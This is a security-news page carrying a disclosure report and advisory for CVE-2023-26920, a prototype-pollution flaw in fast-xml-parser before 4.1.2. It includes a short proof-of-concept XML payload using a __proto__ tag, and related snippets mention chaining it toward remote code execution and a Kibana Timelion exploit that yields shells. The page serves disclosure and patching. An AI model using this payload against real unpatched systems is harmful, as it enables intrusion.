Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-26920: report.md

fast-xml-parser before 4.1.2 allows proto for Prototype Pollution.

CVE
#git#java#rce

Taking an example code from the github repo to demonstrate the bug:

const { XMLParser, XMLBuilder, XMLValidator} = require(“fast-xml-parser”);

let XMLdata = “<__proto__><polluted>hacked</polluted></__proto__>”

const parser = new XMLParser(); let jObj = parser.parse(XMLdata);

console.log(jObj.polluted) // should return hacked

In the above screenshot you can see the jObj was polluted with a new property.

jObj >{} jObj.__proto__ >{polluted: ‘hacked’} jObj.__proto__.polluted >’hacked’

More information on prototype pollution can be found here: https://learn.snyk.io/lessons/prototype-pollution/javascript/

As it is common for developers to pass user controllable input to XMLParser , this can to do unexpected results. By chaining it with some prototype pollution gadget it might even can lead to RCE in some cases https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/

Related news

Kibana Timelion Prototype Pollution Remote Code Execution

Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This leads to an arbitrary command execution with permissions of the Kibana process on the host system. Exploitation will require a service or system reboot to restore normal operation. The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a docker image caused 6 shells.

GHSA-x3cc-x39p-42qx: fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name

### Impact As a part of this vulnerability, user was able to se code using `__proto__` as a tag or attribute name. ```js const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser"); let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>" const parser = new XMLParser(); let jObj = parser.parse(XMLdata); console.log(jObj.polluted) // should return hacked ``` ### Patches The problem has been patched in v4.1.2 ### Workarounds User can check for "__proto__" in the XML string before parsing it to the parser. ### References https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7

CVE-2022-38775: Security issues

An issue was discovered in the rollback feature of Elastic Endpoint Security for Windows, which could allow unprivileged users to elevate their privileges to those of the LocalSystem account.

CVE-2022-23712: Security issues

A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907